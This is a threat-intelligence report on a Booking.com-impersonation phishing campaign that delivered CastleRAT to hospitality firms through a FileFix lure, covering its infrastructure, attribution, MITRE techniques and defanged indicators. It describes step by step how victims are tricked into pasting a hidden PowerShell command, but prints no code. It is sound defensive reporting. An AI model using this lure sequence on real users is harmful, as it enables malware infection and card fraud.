‘Tis the Season for Attacks Spoofing Booking.com

BlueVoyant’s Threat Fusion Cell (TFC) observed a Booking[.]com‑impersonation phishing attack that used a novel FileFix technique to deliver CastleRAT malware against a hospitality sector client. The attack chain and subsequent infrastructure analysis revealed a large-scale, fast‑cycling domain ecosystem aligned with the Transient Marauder/GrayBravo threat cluster. These connections confirm the adversary as a serious initial access threat with, likely seasonal, repeatedly leveraged attack themes. Booking[.]com itself was not involved or compromised; all Booking[.]com references relate solely to adversary brand impersonation.  

What Happened? 

The attack commenced with a socially engineered email bearing the subject “Visitor reply needed now,” sent to a business service email account for a hospitality sector organization, suggesting careful reconnaissance and sector-specific targeting. 

Upon clicking the embedded link (hxxps[://]daytonaliedetector[.]com/d7hv) in the email, the user was redirected to a landing page at hxxps[://]booking.complaint-forms[.]com, a fraudulent domain crafted to impersonate Booking.com. The domain hosted a FileFix attack prompt instructing the user to: (1) click “Verify” which opens a file explorer window; (2) press Ctrl+L to select the file explorer address window; (3) press Ctrl+V to paste a hidden command into that address bar; and (4) press Enter to execute the command. 

The command itself was heavily obfuscated, initiating a hidden PowerShell window that fetched an HTML file from the primary payload server bikolsa[.]com and saved it within the ProgramData directory, subsequently launching it with mshta.exe to execute embedded scripts. This multi-stage process involved VBScript decoding and extraction leading to the download of a zip archive from a secondary subdomain which deployed the final payload, identified through analysis as CastleRAT. 

Infrastructure Analysis 

The attack’s infrastructure footprint included connections to kakapupuneww[.]com, miteamss[.]com, the latter of which has also been linked with a trojanized utility software specifically named Advanced.IP.Scanner2.5.4594.1.exe between September and December 2025. Additionally, BlueVoyant also observed strategic callouts to geolocation service ip-api[.]com and Steam Community pages for potential command-and-control dead drops—a technique where malware does not have its real C2 server address hardcoded inside it, rather, it is programmed to go to a neutral, public-facing platform (the "dead drop") to retrieve the current C2 address when it runs only. This illustrates a well-resourced and layered operational setup. 

BlueVoyant’s Threat Fusion Cell researched related IOC and found an industrial-scale, automated infrastructure operation supporting the recently observed campaign, finding more than of 1,500 domains since the start of the campaign in late August through continued attacks into early December 2025. The findings suggest a highly sophisticated and resilient operational capability designed for mass phishing and malware distribution.  

The domain naming conventions are meticulously crafted to mimic legitimate Booking[.]com workflows, verification and customer service processes, utilizing predictable patterns such as "verifycard[number]-booking[.]com," "confirmation-id[number][.]com," and "guestverify[number]-booking[.]com". These domains are entirely malicious and not associated with Booking[.]com, reflecting broad brand impersonation to create a veneer of authenticity and exploit trust in the branded communication rather than compromise of Booking[.]com systems. 

Temporal analysis of domain registration and activity windows demonstrates a highly dynamic and evasive infrastructure strategy; the vast majority of the domains (over 1,300) were active for less than 30 days, with more than 1,000 observed for under nine days and a significant portion active for less than 24 hours, indicating a rapid churn of disposable domains to evade blocklists and reputation-based security filters. A smaller subset of domains (~140) remained active for over 60 days, and just over 40 were observed for more than 90 days, suggesting these longer-lived domains likely function as core redirectors or payload servers within the multi-tiered infrastructure, potentially acting as resilient mothership channels for distributing initial scripts or managing stolen data. Further, the activity appears to be part of an ongoing campaign that stretches back to mid-2024 at least; however, BlueVoyant noted an activity spike toward the end of August that appears to represent the latest campaign surge. 

The widespread use of HTTPS across these URLs, even on malicious domains, further illustrates the actor's focus on appearing legitimate and bypassing simple security checks that might flag unencrypted connections. The infrastructure is not monolithic; it is partitioned, with distinct clusters of domains and URLs functioning in tandem to handle different stages of the attack chain—initial redirection, ClickFix or FileFix (as observed for the first time in the above attack) prompt delivery, payload retrieval, and data exfiltration—thereby creating a flexible and distributed system that can sustain individual component takedowns without collapsing the entire operation. 

Links to GrayBravo and More

This incident investigation and subsequent campaign analysis reveal multiple similarities between the observed attack chain and the CastleRAT malware campaign techniques detailed in early September by RecordedFuture and further elaborated on in Recorded Future’s December report on GrayBravo—specifically, activity Cluster 3 described in the report and for which BlueVoyant has assigned the moniker Transient Marauder. As an aside, identical activity was simultaneously, but separately reported by eSentire as NightShadeC2, which BlueVoyant now highlights as an alias for CastleRAT.  

The initial access vector aligns exactly with the described ClickFix approach using Booking[.]com-themed landing pages (again, purely impersonation and not connected to Booking[.]com), except the BlueVoyant case identified the first usage of a FileFix technique with this adversary. The attack chain’s reliance on PowerShell to retrieve and execute a remote HTML file mirrors the .NET-based loader methodology described in the reporting. The final payload’s behavior—querying ip-api[.]com for geolocation and VPN detection and utilizing Steam Community URLs for dynamic C2 routing—is a hallmark of CastleRAT’s (a.k.a. NightShadeC2) fingerprinting and evasion techniques. Additionally, the presence of keylogging and clipboard harvesting capabilities described by eSentire were also observed in the sample analyzed by BlueVoyant researchers, with stolen data written to AppData directories. The delivery of the malware through a zip archive retrieved from a disguised domain further echoes CastleRAT distribution and further cements the tactical alignment. 

Furthermore, the malware’s ability to download and execute additional payloads align perfectly with the technical specifications of both the C and Python variants of CastleRAT described in OSINT reporting. The observed network callouts to steamcommunity[.]com correlate and use of Steam profiles for C2 dead drops, a sophisticated technique to dynamically update infrastructure without altering the malware binary. The broader infrastructure ties, including the use of Cloudflare-protected domains for payload delivery and the presence of tiered C2 servers, reflect the multi-layered infrastructure model that RecordedFuture’s Insikt Group attributed to Transient Marauder (a.k.a. GrayBravo Cluster 3), confirming a highly organized and resilient operational architecture. 

BlueVoyant researchers also identified significant overlap between the Transient Marauder and Microsoft’s Storm-1865 cluster reported in March 2025. Both used an identical infection chain that tricks users with ClickFix into executing commands via Windows' mshta.exe utility to deploy commodity malware payloads. The sustained focus on the hospitality industry from late 2024 into early 2025, combined with strongly correlated social engineering lures, similar technical delivery mechanisms, and overlapping payloads, leads BlueVoyant to assess with high confidence that these clusters represent the same threat entity or a tightly coordinated alliance. 

Finally, the activity also aligns perfectly with Netcraft reporting that confirmed a sprawling and interconnected cybercriminal ecosystem targeting the hospitality sector distinguished by a shared initial attack vector but divergent final objectives. This cumulative, linked reporting highlights the massive and sophisticated use of Booking[.]com (and other travel services) brand impersonation, employing identical domain naming conventions—such as "verifycard[number]-booking.com" and "confirmation-id[number].com"—across a vast, evasive infrastructure numbering in the thousands of domains. 

The campaigns unfold on at least two distinct fronts. The first front, described in the attack observed by BlueVoyant above and others, involves using these lures to deploy malware like CastleRAT via ClickFix/FileFix social engineering techniques, aiming to gain initial access to the systems of hospitality sector entities. A second front, detailed by Netcraft, exploits this same initial access or parallel infiltration methods for a different goal: direct financial fraud. Here, the vast phishing infrastructure is used to target the guests of previously compromised hotels, tricking them with convincing lures related to their reservations. The goal is to convince users to provide credit card inormation for fraudulent transactions in a scheme known as "carding". This two-pronged approach demonstrates a highly organized criminal operation where the compromise of hospitality providers enables a secondary, highly profitable wave of attacks against their customers, with both fronts leveraging the same core infrastructure and deceptive tactics for maximum impact. 

Conclusion 

At no point in this campaign did BlueVoyant observe any compromise of Booking.com systems; all Booking.com references in this report relate solely to adversary spoofing activity.  

BlueVoyant's investigation highlights four critical findings regarding the Transient Marauder (a.k.a. GrayBravo Cluster 3) adversary's recent campaign. First, the observed attack demonstrates the group's adoption of a new tactic with the FileFix technique, a sophisticated social engineering method that manipulates users into executing malicious commands via the file explorer, representing an evolution from their previously documented ClickFix approach. Second, the technical evidence showed strong, direct overlap with Recorded Future's detailing of Transient Marauder activity, confirming this campaign's place within the adversary's broader operational framework. Third, the seamless alignment of these TTPs with those of the Microsoft-designated Storm-1865 group, from shared victimology in the hospitality industry to identical payloads and delivery mechanisms, leads BlueVoyant to assess with high confidence that Transient Marauder and Storm-1865 are part of the same activity cluster. This connection suggests a persistent threat against the sector that has been running well over a year and evolving its attacks. 

Finally, while Recorded Future's analysis of Transient Marauder (a.k.a. GrayBravo Cluster 3) focused on the initial access and malware delivery phase, at least one of the campaign's objectives is confirmed by the significant linkages between BlueVoyant-identified campaign infrastructure and earlier Netcraft reporting. That goal is the compromise of hospitality sector entities to serve as a launchpad for a secondary, highly profitable wave of attacks. This subsequent front targets the compromised hotels' guests with fraudulent credit card phishing lures, exploiting stolen reservation data to create a two-tiered monetization strategy that maximizes impact and financial gain from a single initial intrusion. 

Organizations within the hospitality sector, as a primary target of this campaign, must prioritize security awareness training that is tailored to the specific threats their employees who manage their business communications face. Training should move beyond generic phishing examples to simulate highly targeted Business Email Compromise (BEC) attacks, specifically those impersonating booking platforms like Booking[.]com. Personnel should be drilled on the hallmarks of these scams, such as urgency ("reply needed now"), spoofed sender addresses, and instructions to bypass normal procedures. 

Individuals who receive a suspicious communication purportedly from a booking platform or hotel should take immediate steps to verify its legitimacy without engaging with the potentially malicious content. Do not click on any links or call any numbers provided in the email. Instead, directly navigate to the official website of the hotel or travel agency by typing the known URL into your browser or using a previously saved bookmark. Contact the establishment directly using the official phone number or email address listed on their confirmed website to inquire about the message. Under no circumstances should you follow instructions to open Windows Run prompts, execute copied commands, or install any verification software, as these are designed to infect your device. 

BlueVoyant's TFC used this intelligence to distill relevant behaviors and indicators, map them to BlueVoyant's current coverage and detection portfolio to pinpoint potential visibility enhancements. Using those findings, BlueVoyant built and deployed focused hunt packages and tuned detections to proactively surface related activity across environments. The results flow back into playbooks and detection engineering, so each hunt tightens fidelity and accelerates future investigations. 

MITRE ATT&CK Techniques 

T1566.002 Spearphishing Link  

T1583.001 Domains  

T1027.010 Command Obfuscation  

T1059.001 PowerShell  

T1218.005 Mshta  

T1059.005 Visual Basic  

T1560.001 Archive via Utility  

T1056.001 Keylogging  

T1115 Clipboard Data  

T1568.001 Fast Flux DNS  

T1102.001 Dead Drop Resolver  

T1483 Domain Generation Algorithms  

T1036.005 Match Legitimate Resource Name or Location  

T1104 Multi-Stage Channels  

T1590.006 Network Security Appliances  

T1071.001 Web Protocols  

T1114.002 Remote Email Collection  

T1105 Ingress Tool Transfer  

T1078.002 Domain Accounts  

T1562.001 Disable or Modify Tools  

T1567.002 Exfiltration to Cloud Storage  

T1074.001 Local Data Staging  

T1132.001 Standard Encoding  

T1090.003 Multi-hop Proxy  

T1590.001 Domain Properties 

Indicators of Compromise 

hxxps[://]daytonaliedetector[.]com/d7hv 

hxxps[://]booking.complaint-forms[.]com 

hxxps[://]bikolsa[.]com/pipa 

daytonaliedetector[.]com 

booking[.]complaint-forms[.]com 

bikolsa[.]com 

kakapupuneww[.]com